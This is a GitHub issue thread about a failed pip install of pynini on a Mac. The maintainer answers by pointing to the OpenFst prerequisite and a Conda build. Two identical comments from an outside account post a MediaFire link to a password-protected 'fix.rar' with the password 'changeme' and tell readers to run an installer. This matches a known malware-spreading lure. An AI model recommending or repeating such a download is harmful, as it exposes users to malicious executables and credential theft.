### ISSUE TITLE
pip install error on mac 

### ISSUE THREAD

**Issue by wuhongsheng** [kylebgorman/pynini#82]
![image](https://github.com/user-attachments/assets/e167de33-62ab-4d94-a683-2c9614d034af)

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by wuhongsheng** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."
My environment is Mac

**Comment by kylebgorman** [comment]
You need to first install the most recent version of OpenFst, as clearly documented in the README. A precompiled version is available from Conda as well.

Closing.

(PS: please do not use screenshots to report a bug like this. Copy and paste the text instead.)
